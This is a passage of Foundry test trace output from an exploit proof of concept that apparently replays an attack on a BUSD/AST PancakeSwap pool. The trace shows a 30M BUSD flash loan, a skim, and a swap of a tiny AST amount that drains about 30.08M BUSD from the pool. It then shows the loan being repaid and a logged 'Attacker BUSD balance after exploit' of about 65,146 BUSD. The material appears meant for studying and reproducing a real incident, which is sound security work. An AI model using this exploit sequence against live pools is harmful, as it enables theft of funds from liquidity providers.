    │   │   ├─ emit log_named_decimal_uint(key: "[Info] LP BUSD balance after skim", val: 30080145197852789777147003 [3.008e25], decimals: 18)
    │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   └─ ← [Return] 1
    │   │   ├─ emit log_named_decimal_uint(key: "[Info] LP AST balance after skim", val: 1, decimals: 18)
    │   │   ├─ [617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 311649995405546500 [3.116e17]
    │   │   ├─ [51372] pancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(311649995405546500 [3.116e17], 0, [0xc10E0319337c7F83342424Df72e73a70A29579B2, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1737475209 [1.737e9])
    │   │   │   ├─ [20361] AST::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], 311649995405546500 [3.116e17])
    │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x8f0138187a035808448C80D3bA8E251b2b7e9F4e, value: 12461999816221860 [1.246e16])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], value: 299087995589324640 [2.99e17])
    │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 1 → 0x000000000000000000000000000000000000000000000000042692f285af6f61
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000453340506665404 → 0
    │   │   │   │   │   @ 0x41a71bb7bec07a5a52ca70f73e36e80346c4f1536efcedec771bfb3c211d9e23: 0x00000000000000000000000000000000000000000000000000297ee5eafa0000 → 0x0000000000000000000000000000000000000000000000000055c5055b36a4a4
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   ├─ [893] BUSD_AST_LPPool::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25], 1, 1737475209 [1.737e9]
    │   │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 299087995589324641 [2.99e17]
    │   │   │   ├─ [21247] BUSD_AST_LPPool::swap(30080145197852789676322046 [3.008e25], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [6071] BUSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30080145197852789676322046 [3.008e25])
    │   │   │   │   │   ├─ emit Transfer(from: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 30080145197852789676322046 [3.008e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b → 0x000000000000000000000000000000000000000000000000000000000602777d
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x00000000000000000000000000000000000000000018e1b7fe296e3445822cfe
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 100824957 [1.008e8]
    │   │   │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 299087995589324641 [2.99e17]
    │   │   │   │   ├─ emit Sync(reserve0: 100824957 [1.008e8], reserve1: 299087995589324641 [2.99e17])
    │   │   │   │   ├─ emit Swap(sender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 299087995589324640 [2.99e17], amount0Out: 30080145197852789676322046 [3.008e25], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x678fc489000000000000000000000000000100000018e1b7f048b780a420a47b → 0x678fc489000000000000042692f285af6f61000000000000000000000602777d
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080146197852789676322046 [3.008e25]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] BUSD::transfer(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050], 30015000000000000000000000 [3.001e25])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050], value: 30015000000000000000000000 [3.001e25])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x0000000000000000000000000000000000000000000cf2dbdd3738e52632c4e3 → 0x00000000000000000000000000000000000000000025c6c846446b560f92c4e3
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000018e1b7fe296e3445822cfe → 0x000000000000000000000000000000000000000000000dcb951c3bc35c222cfe
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b → 0x00000000000000000000000000000000000000000018e1b7fe296e344b84a47b
    │   │   └─ ← [Stop]
    │   ├─ [531] BUSD::balanceOf(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050]) [staticcall]
    │   │   └─ ← [Return] 45668978301454109570680035 [4.566e25]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050]) [staticcall]
    │   │   └─ ← [Return] 10174523019143306513145 [1.017e22]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 30000000000000000000000000 [3e25], param3: 0, param4: 15000000000000000000000 [1.5e22], param5: 0)
    │   ├─  storage changes:
    │   │   @ 4: 0x000000000000000107909d5771c9f28400000000000002c669baf92b30ead28d → 0x000000000000000107909d5771c9f28400000000000003dae272bc35ed1ad28d
    │   │   @ 2: 0x00000000000000000000000000000000fa4f94a53e04511e09a3c748aab354c8 → 0x00000000000000000000000000000000fb5e051bece1d8b76744bb85ac825680
    │   └─ ← [Stop]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 65146197852789676322046 [6.514e22]
    ├─ emit log_named_decimal_uint(key: "[Info] Attacker BUSD balance after exploit", val: 65146197852789676322046 [6.514e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.21s (32.64ms CPU time)

Ran 2 test suites in 2.02s (1.78s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
